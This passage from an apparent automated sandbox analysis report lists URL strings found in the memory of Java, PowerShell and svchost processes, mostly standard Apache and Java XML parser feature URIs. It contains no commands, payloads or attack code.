Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansionG
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsx
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/include-comments
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/include-comments1
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesX
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growth;
Source: javaw.exe, 00000002.00000003.1078204806.00000000157D4000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespaces
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdA
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs:
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformantg/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default=
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef3
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xincludeC
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name3
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/input-buffer-sizetp://a
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor7
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner7
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler=
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter8
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table6
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory8
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler;
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/locale
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypesxc
Source: javaw.exe, 00000002.00000002.3385302759.0000000009FDB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr	String found in binary or memory: http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven
Source: powershell.exe, 00000005.00000002.1095173503.0000000007001000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.miZT
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000007.00000002.2860702019.000001C7D6C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.1203071644.000001C7D6B10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, javaw.exe, 00000002.00000002.3385302759.0000000009FE0000.00000004.00001000.00020000.00000000.sdmp, java.dll.0.dr	String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/jaxp/xpath/dom
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource;
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/)
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A5FD000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A5FD000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: fxplugins.dll.0.dr	String found in binary or memory: http://javafx.com/
Source: fxplugins.dll.0.dr	String found in binary or memory: http://javafx.com/vp6decoderflvdemux
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTDR
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet8
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
